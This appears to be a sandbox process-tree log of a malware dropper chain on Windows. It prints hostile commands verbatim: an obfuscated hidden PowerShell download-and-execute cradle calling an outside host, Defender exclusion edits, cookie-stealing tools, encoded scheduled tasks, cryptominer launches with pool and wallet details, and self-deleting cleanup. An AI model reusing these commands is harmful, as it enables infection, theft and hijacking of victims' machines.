C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"3⤵PID:7692
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"4⤵PID:4952
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-NA6P6.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-NA6P6.tmp\IBInstaller_97039.tmp" /SL5="$3028E,9887378,721408,C:\Users\Admin\AppData\Local\Temp\czlox43mlna\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq1⤵PID:4812
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://italyfabricone.club/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=970392⤵PID:2996
-
-
C:\Users\Admin\AppData\Local\Temp\is-0E8G3.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-0E8G3.tmp\{app}\chrome_proxy.exe"2⤵PID:4448
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-0E8G3.tmp\{app}\chrome_proxy.exe"3⤵PID:4596
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 44⤵
- Runs ping.exe
PID:5828
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-7RMC1.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-7RMC1.tmp\Setup3310.tmp" /SL5="$402B8,138429,56832,C:\Users\Admin\AppData\Local\Temp\cd0uvwurjen\Setup3310.exe" /Verysilent /subid=5771⤵PID:4668
-
C:\Users\Admin\AppData\Local\Temp\is-B3DD3.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-B3DD3.tmp\Setup.exe" /Verysilent2⤵PID:5108
-
C:\Program Files (x86)\Versium Research\Versium Research\customer5.exe"C:\Program Files (x86)\Versium Research\Versium Research\customer5.exe"3⤵PID:5192
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe"4⤵PID:5420
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\parse.exeparse.exe -f json -b edge5⤵PID:7332
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\parse.exeparse.exe -f json -b chrome5⤵PID:7324
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\parse.exeparse.exe -f json -b firefox5⤵PID:7316
-
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\hjjgaa.exe"C:\Program Files (x86)\Versium Research\Versium Research\hjjgaa.exe"3⤵PID:5208
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:3784
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6884
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\RunWW.exe"C:\Program Files (x86)\Versium Research\Versium Research\RunWW.exe"3⤵PID:5232
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5232 -s 7644⤵
- Program crash
PID:6572
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\Versium Research\Versium Research\jg7_7wjg.exe"3⤵PID:5264
-
-
C:\Program Files (x86)\Versium Research\Versium Research\LabPicV3.exe"C:\Program Files (x86)\Versium Research\Versium Research\LabPicV3.exe"3⤵PID:5280
-
C:\Users\Admin\AppData\Local\Temp\is-ADT1K.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-ADT1K.tmp\LabPicV3.tmp" /SL5="$402DE,239334,155648,C:\Program Files (x86)\Versium Research\Versium Research\LabPicV3.exe"4⤵PID:5436
-
C:\Users\Admin\AppData\Local\Temp\is-KDKKF.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-KDKKF.tmp\ppppppfy.exe" /S /UID=lab2145⤵PID:5704
-
C:\Program Files\Windows Photo Viewer\PXHSNBXCBJ\prolab.exe"C:\Program Files\Windows Photo Viewer\PXHSNBXCBJ\prolab.exe" /VERYSILENT6⤵PID:4928
-
C:\Users\Admin\AppData\Local\Temp\is-TMA0S.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-TMA0S.tmp\prolab.tmp" /SL5="$40354,575243,216576,C:\Program Files\Windows Photo Viewer\PXHSNBXCBJ\prolab.exe" /VERYSILENT7⤵PID:4776
-
-
-
C:\Users\Admin\AppData\Local\Temp\ac-85550-618-13897-96f4552712ef0\Rubatykiqy.exe"C:\Users\Admin\AppData\Local\Temp\ac-85550-618-13897-96f4552712ef0\Rubatykiqy.exe"6⤵PID:1204
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kjhv4fpm.nxf\gaooo.exe & exit7⤵PID:7104
-
C:\Users\Admin\AppData\Local\Temp\kjhv4fpm.nxf\gaooo.exeC:\Users\Admin\AppData\Local\Temp\kjhv4fpm.nxf\gaooo.exe8⤵PID:3948
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt9⤵PID:2904
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt9⤵PID:6604
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\whbl23sb.yrl\md7_7dfj.exe & exit7⤵PID:416
-
C:\Users\Admin\AppData\Local\Temp\whbl23sb.yrl\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\whbl23sb.yrl\md7_7dfj.exe8⤵PID:6560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xjye0soo.x5t\customer6.exe & exit7⤵PID:5356
-
C:\Users\Admin\AppData\Local\Temp\xjye0soo.x5t\customer6.exeC:\Users\Admin\AppData\Local\Temp\xjye0soo.x5t\customer6.exe8⤵PID:7136
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"9⤵PID:6928
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ehagfwjy.o4v\askinstall31.exe & exit7⤵PID:5180
-
C:\Users\Admin\AppData\Local\Temp\ehagfwjy.o4v\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\ehagfwjy.o4v\askinstall31.exe8⤵PID:7292
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵PID:7908
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
PID:5448
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v1mwnhjk.bfl\HookSetp.exe & exit7⤵PID:1488
-
C:\Users\Admin\AppData\Local\Temp\v1mwnhjk.bfl\HookSetp.exeC:\Users\Admin\AppData\Local\Temp\v1mwnhjk.bfl\HookSetp.exe8⤵PID:7792
-
C:\ProgramData\4797612.exe"C:\ProgramData\4797612.exe"9⤵PID:7604
-
-
C:\ProgramData\3512713.exe"C:\ProgramData\3512713.exe"9⤵PID:5880
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\snqgmj0j.15d\BlueSignal_installer.exe & exit7⤵PID:7264
-
C:\Users\Admin\AppData\Local\Temp\snqgmj0j.15d\BlueSignal_installer.exeC:\Users\Admin\AppData\Local\Temp\snqgmj0j.15d\BlueSignal_installer.exe8⤵PID:7968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uoqifxbw.hse\privacytools5.exe & exit7⤵PID:7684
-
C:\Users\Admin\AppData\Local\Temp\uoqifxbw.hse\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\uoqifxbw.hse\privacytools5.exe8⤵PID:7228
-
C:\Users\Admin\AppData\Local\Temp\uoqifxbw.hse\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\uoqifxbw.hse\privacytools5.exe9⤵PID:7800
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tvxfio3a.wzx\GcleanerWW.exe /mixone & exit7⤵PID:7892
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\00paa41l.04v\setup.exe /8-2222 & exit7⤵PID:5788
-
C:\Users\Admin\AppData\Local\Temp\00paa41l.04v\setup.exeC:\Users\Admin\AppData\Local\Temp\00paa41l.04v\setup.exe /8-22228⤵PID:2260
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Polished-Lake"9⤵PID:7832
-
-
C:\Program Files (x86)\Polished-Lake\7za.exe"C:\Program Files (x86)\Polished-Lake\7za.exe" e -p154.61.71.13 winamp-plugins.7z9⤵PID:3352
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Polished-Lake\setup.exe" -map "C:\Program Files (x86)\Polished-Lake\WinmonProcessMonitor.sys""9⤵PID:5060
-
C:\Program Files (x86)\Polished-Lake\setup.exe"C:\Program Files (x86)\Polished-Lake\setup.exe" -map "C:\Program Files (x86)\Polished-Lake\WinmonProcessMonitor.sys"10⤵PID:5780
-
-
-
C:\Program Files (x86)\Polished-Lake\7za.exe"C:\Program Files (x86)\Polished-Lake\7za.exe" e -p154.61.71.13 winamp.7z9⤵PID:8812
-
-
C:\Program Files (x86)\Polished-Lake\setup.exe"C:\Program Files (x86)\Polished-Lake\setup.exe" /8-22229⤵PID:6620
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uez3a043.mjv\b9706c20.exe & exit7⤵PID:6352
-
C:\Users\Admin\AppData\Local\Temp\uez3a043.mjv\b9706c20.exeC:\Users\Admin\AppData\Local\Temp\uez3a043.mjv\b9706c20.exe8⤵PID:8076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4bclzasq.ibk\file.exe & exit7⤵PID:7284
-
C:\Users\Admin\AppData\Local\Temp\4bclzasq.ibk\file.exeC:\Users\Admin\AppData\Local\Temp\4bclzasq.ibk\file.exe8⤵PID:7500
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"9⤵PID:2136
-
C:\Users\Admin\AppData\Local\Temp\9G1AXK3W0Q\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\9G1AXK3W0Q\multitimer.exe" 0 3060197d33d91c80.94013368 0 10110⤵PID:8376
-
C:\Users\Admin\AppData\Local\Temp\9G1AXK3W0Q\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\9G1AXK3W0Q\multitimer.exe" 1 3.1616622220.605bb28c04114 10111⤵PID:8764
-
C:\Users\Admin\AppData\Local\Temp\9G1AXK3W0Q\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\9G1AXK3W0Q\multitimer.exe" 2 3.1616622220.605bb28c0411412⤵PID:4892
-
C:\Users\Admin\AppData\Local\Temp\kn0wsiy5eav\app.exe"C:\Users\Admin\AppData\Local\Temp\kn0wsiy5eav\app.exe" /8-2313⤵PID:9040
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Rough-Sun"14⤵PID:2136
-
-
C:\Program Files (x86)\Rough-Sun\7za.exe"C:\Program Files (x86)\Rough-Sun\7za.exe" e -p154.61.71.13 winamp-plugins.7z14⤵PID:6872
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Rough-Sun\app.exe" -map "C:\Program Files (x86)\Rough-Sun\WinmonProcessMonitor.sys""14⤵PID:3720
-
C:\Program Files (x86)\Rough-Sun\app.exe"C:\Program Files (x86)\Rough-Sun\app.exe" -map "C:\Program Files (x86)\Rough-Sun\WinmonProcessMonitor.sys"15⤵PID:7708
-
-
-
C:\Program Files (x86)\Rough-Sun\7za.exe"C:\Program Files (x86)\Rough-Sun\7za.exe" e -p154.61.71.13 winamp.7z14⤵PID:6552
-
-
C:\Program Files (x86)\Rough-Sun\app.exe"C:\Program Files (x86)\Rough-Sun\app.exe" /8-2314⤵PID:6824
-
-
-
C:\Users\Admin\AppData\Local\Temp\unzgqzv5kx0\vict.exe"C:\Users\Admin\AppData\Local\Temp\unzgqzv5kx0\vict.exe" /VERYSILENT /id=53513⤵PID:3996
-
C:\Users\Admin\AppData\Local\Temp\is-ISOFR.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-ISOFR.tmp\vict.tmp" /SL5="$D025E,870426,780800,C:\Users\Admin\AppData\Local\Temp\unzgqzv5kx0\vict.exe" /VERYSILENT /id=53514⤵PID:8796
-
C:\Users\Admin\AppData\Local\Temp\is-0DCGU.tmp\winhost.exe"C:\Users\Admin\AppData\Local\Temp\is-0DCGU.tmp\winhost.exe" 53515⤵PID:7220
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ekpui14dfsp\abtdeg4m0i4.exe"C:\Users\Admin\AppData\Local\Temp\ekpui14dfsp\abtdeg4m0i4.exe" /ustwo INSTALL13⤵PID:7420
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "abtdeg4m0i4.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ekpui14dfsp\abtdeg4m0i4.exe" & exit14⤵PID:9072
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "abtdeg4m0i4.exe" /f15⤵
- Kills process with taskkill
PID:6528
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\qb0qnq3pupg\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\qb0qnq3pupg\Setup3310.exe" /Verysilent /subid=57713⤵PID:7724
-
-
C:\Users\Admin\AppData\Local\Temp\qqsvxwrc52b\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\qqsvxwrc52b\AwesomePoolU1.exe"13⤵PID:8704
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\KTV0G33GVG\setups.exe"C:\Users\Admin\AppData\Local\Temp\KTV0G33GVG\setups.exe" ll10⤵PID:8440
-
C:\Users\Admin\AppData\Local\Temp\is-TP9UK.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-TP9UK.tmp\setups.tmp" /SL5="$5056A,250374,58368,C:\Users\Admin\AppData\Local\Temp\KTV0G33GVG\setups.exe" ll11⤵PID:8236
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"9⤵PID:7384
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe10⤵PID:9180
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe11⤵
- Kills process with taskkill
PID:4820
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"9⤵PID:6504
-
C:\Users\Admin\AppData\Roaming\D5D5.tmp.exe"C:\Users\Admin\AppData\Roaming\D5D5.tmp.exe"10⤵PID:8828
-
C:\Users\Admin\AppData\Roaming\D5D5.tmp.exe"C:\Users\Admin\AppData\Roaming\D5D5.tmp.exe"11⤵PID:1496
-
-
-
C:\Users\Admin\AppData\Roaming\DAF7.tmp.exe"C:\Users\Admin\AppData\Roaming\DAF7.tmp.exe"10⤵PID:8680
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\DAF7.tmp.exe"11⤵PID:6812
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK12⤵
- Delays execution with timeout.exe
PID:9052
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2d7f8dff..exe"C:\Users\Admin\AppData\Local\Temp\2d7f8dff..exe"10⤵PID:7900
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 999911⤵PID:5000
-
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999911⤵PID:8312
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"10⤵PID:8748
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.111⤵
- Runs ping.exe
PID:2748
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"9⤵PID:8764
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3oyyhwad.fiz\Four.exe & exit7⤵PID:5564
-
C:\Users\Admin\AppData\Local\Temp\3oyyhwad.fiz\Four.exeC:\Users\Admin\AppData\Local\Temp\3oyyhwad.fiz\Four.exe8⤵PID:7700
-
C:\Users\Admin\AppData\Local\Temp\29O6PQBG30\setups.exe"C:\Users\Admin\AppData\Local\Temp\29O6PQBG30\setups.exe" ll9⤵PID:8332
-
C:\Users\Admin\AppData\Local\Temp\is-UV7F1.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-UV7F1.tmp\setups.tmp" /SL5="$205E0,250374,58368,C:\Users\Admin\AppData\Local\Temp\29O6PQBG30\setups.exe" ll10⤵PID:8652
-
-
-
C:\Users\Admin\AppData\Local\Temp\B6UB7HZKQL\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\B6UB7HZKQL\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 1049⤵PID:8268
-
C:\Users\Admin\AppData\Local\Temp\B6UB7HZKQL\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\B6UB7HZKQL\multitimer.exe" 1 3.1616622219.605bb28b70bc7 10410⤵PID:9096
-
C:\Users\Admin\AppData\Local\Temp\B6UB7HZKQL\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\B6UB7HZKQL\multitimer.exe" 2 3.1616622219.605bb28b70bc711⤵PID:5184
-
C:\Users\Admin\AppData\Local\Temp\ot0bclewyyx\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\ot0bclewyyx\AwesomePoolU1.exe"12⤵PID:1316
-
-
C:\Users\Admin\AppData\Local\Temp\ex1g4kft3uk\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\ex1g4kft3uk\Setup3310.exe" /Verysilent /subid=57712⤵PID:7416
-
C:\Users\Admin\AppData\Local\Temp\is-48SGL.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-48SGL.tmp\Setup3310.tmp" /SL5="$804C8,138429,56832,C:\Users\Admin\AppData\Local\Temp\ex1g4kft3uk\Setup3310.exe" /Verysilent /subid=57713⤵PID:1296
-
C:\Users\Admin\AppData\Local\Temp\is-R636O.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-R636O.tmp\Setup.exe" /Verysilent14⤵PID:5248
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\r5uuflttixy\app.exe"C:\Users\Admin\AppData\Local\Temp\r5uuflttixy\app.exe" /8-2312⤵PID:9084
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Solitary-Surf"13⤵PID:4108
-
-
C:\Program Files (x86)\Solitary-Surf\7za.exe"C:\Program Files (x86)\Solitary-Surf\7za.exe" e -p154.61.71.13 winamp-plugins.7z13⤵PID:6128
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Solitary-Surf\app.exe" -map "C:\Program Files (x86)\Solitary-Surf\WinmonProcessMonitor.sys""13⤵PID:7468
-
C:\Program Files (x86)\Solitary-Surf\app.exe"C:\Program Files (x86)\Solitary-Surf\app.exe" -map "C:\Program Files (x86)\Solitary-Surf\WinmonProcessMonitor.sys"14⤵PID:7612
-
-
-
C:\Program Files (x86)\Solitary-Surf\7za.exe"C:\Program Files (x86)\Solitary-Surf\7za.exe" e -p154.61.71.13 winamp.7z13⤵PID:3820
-
-
C:\Program Files (x86)\Solitary-Surf\app.exe"C:\Program Files (x86)\Solitary-Surf\app.exe" /8-2313⤵PID:4780
-
-
-
C:\Users\Admin\AppData\Local\Temp\ippuynbc0fy\vict.exe"C:\Users\Admin\AppData\Local\Temp\ippuynbc0fy\vict.exe" /VERYSILENT /id=53512⤵PID:8592
-
C:\Users\Admin\AppData\Local\Temp\is-IM8S1.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-IM8S1.tmp\vict.tmp" /SL5="$A0296,870426,780800,C:\Users\Admin\AppData\Local\Temp\ippuynbc0fy\vict.exe" /VERYSILENT /id=53513⤵PID:8120
-
C:\Users\Admin\AppData\Local\Temp\is-JO6E8.tmp\winhost.exe"C:\Users\Admin\AppData\Local\Temp\is-JO6E8.tmp\winhost.exe" 53514⤵PID:6904
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\atb4rqxqy3o\drwtewo44su.exe"C:\Users\Admin\AppData\Local\Temp\atb4rqxqy3o\drwtewo44su.exe" /ustwo INSTALL12⤵PID:9044
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "drwtewo44su.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\atb4rqxqy3o\drwtewo44su.exe" & exit13⤵PID:5840
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "drwtewo44su.exe" /f14⤵
- Kills process with taskkill
PID:5912
-
-
-
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n43eoiwq.cug\setup.exe /S /kr /site_id=754 & exit7⤵PID:4916
-
C:\Users\Admin\AppData\Local\Temp\n43eoiwq.cug\setup.exeC:\Users\Admin\AppData\Local\Temp\n43eoiwq.cug\setup.exe /S /kr /site_id=7548⤵PID:4528
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"9⤵PID:4064
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&10⤵PID:8196
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3211⤵PID:8208
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6411⤵PID:8288
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gHKgRPKPs" /SC once /ST 04:53:15 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="9⤵
- Creates scheduled task(s)
PID:8352
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gHKgRPKPs"9⤵PID:8624
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gHKgRPKPs"9⤵PID:4796
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bmIXAqnwlcZKDlfrrr" /SC once /ST 22:41:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\oHMHtlDCFUByPPw\kOTzNYG.exe\" 9n /site_id 754 /S" /V1 /F9⤵
- Creates scheduled task(s)
PID:8692
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "bmIXAqnwlcZKDlfrrr"9⤵PID:1044
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1a-77187-771-bdb98-dfd0aeff57cd2\Xelagufufy.exe"C:\Users\Admin\AppData\Local\Temp\1a-77187-771-bdb98-dfd0aeff57cd2\Xelagufufy.exe"6⤵PID:68
-
-
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\INr0xRwilfeIDzO0jj8ipF07.exe"C:\Program Files (x86)\Versium Research\Versium Research\INr0xRwilfeIDzO0jj8ipF07.exe"3⤵PID:5360
-
C:\Users\Admin\Documents\FXCyPNrtyMWYAzNFectkPCcj.exe"C:\Users\Admin\Documents\FXCyPNrtyMWYAzNFectkPCcj.exe"4⤵PID:5624
-
C:\Users\Admin\Documents\h05Rnb4jQHmLoxd21uOnoFgP.exe"C:\Users\Admin\Documents\h05Rnb4jQHmLoxd21uOnoFgP.exe"5⤵PID:6316
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo yLBUjKkTN6⤵PID:6980
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\system32\cmd.exe < Infervora.aac6⤵PID:6256
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe7⤵PID:5988
-
-
-
-
C:\Users\Admin\Documents\sUUayS0A9QAmlGiqKsjCLjSg.exe"C:\Users\Admin\Documents\sUUayS0A9QAmlGiqKsjCLjSg.exe"5⤵PID:4132
-
C:\Users\Admin\Documents\sUUayS0A9QAmlGiqKsjCLjSg.exe"C:\Users\Admin\Documents\sUUayS0A9QAmlGiqKsjCLjSg.exe"6⤵PID:6424
-
-
-
C:\Users\Admin\Documents\TpPta2e3M4dm9YJkW8O1GP75.exe"C:\Users\Admin\Documents\TpPta2e3M4dm9YJkW8O1GP75.exe"5⤵PID:6288
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{QJZZ-qrgwL-RGdv-FAYAk}\26453032185.exe"6⤵PID:4312
-
C:\Users\Admin\AppData\Local\Temp\{QJZZ-qrgwL-RGdv-FAYAk}\26453032185.exe"C:\Users\Admin\AppData\Local\Temp\{QJZZ-qrgwL-RGdv-FAYAk}\26453032185.exe"7⤵PID:6832
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 26453032185.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{QJZZ-qrgwL-RGdv-FAYAk}\26453032185.exe" & del C:\ProgramData\*.dll & exit8⤵PID:7216
-
